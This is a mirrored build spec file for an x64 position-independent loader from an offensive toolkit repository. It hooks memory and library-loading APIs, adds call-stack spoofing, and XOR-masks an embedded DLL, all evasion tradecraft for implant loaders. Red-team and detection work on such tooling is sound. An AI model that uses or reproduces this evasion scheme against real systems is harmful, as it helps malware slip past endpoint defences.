mirror of
https://github.com/nickswink/Crystal-Kit-Xenon
synced 2026-06-21 14:02:19 +00:00
49 lines
1.1 KiB
RPMSpec
49 lines
1.1 KiB
RPMSpec
x64:
|
|
load "bin/loader.x64.o"
|
|
make pic +gofirst +optimize +disco
|
|
|
|
# merge pic services
|
|
run "services.spec"
|
|
|
|
patch "get_module_handle" $GMH
|
|
patch "get_proc_address" $GPA
|
|
|
|
# merge hooks into the loader
|
|
load "bin/hooks.x64.o"
|
|
merge
|
|
|
|
# merge call stack spoofing into the loader
|
|
load "bin/spoof.x64.o"
|
|
merge
|
|
|
|
# load the stack spoofing assembly
|
|
load "bin/draugr.x64.bin"
|
|
# link is ok here because loader
|
|
# will be in RX or RWX memory
|
|
link "draugr_stub"
|
|
|
|
# hook functions that the loader uses
|
|
attach "KERNEL32$LoadLibraryA" "_LoadLibraryA"
|
|
attach "KERNEL32$VirtualAlloc" "_VirtualAlloc"
|
|
attach "KERNEL32$VirtualProtect" "_VirtualProtect"
|
|
attach "KERNEL32$VirtualFree" "_VirtualFree"
|
|
|
|
preserve "KERNEL32$LoadLibraryA" "init_frame_info"
|
|
|
|
# mask & link the dll
|
|
generate $MASK 128
|
|
push $DLL
|
|
xor $MASK
|
|
preplen
|
|
link "dll"
|
|
|
|
push $MASK
|
|
preplen
|
|
link "mask"
|
|
|
|
# now get the tradecraft as a PICO
|
|
run "pico.spec"
|
|
link "pico"
|
|
|
|
export
|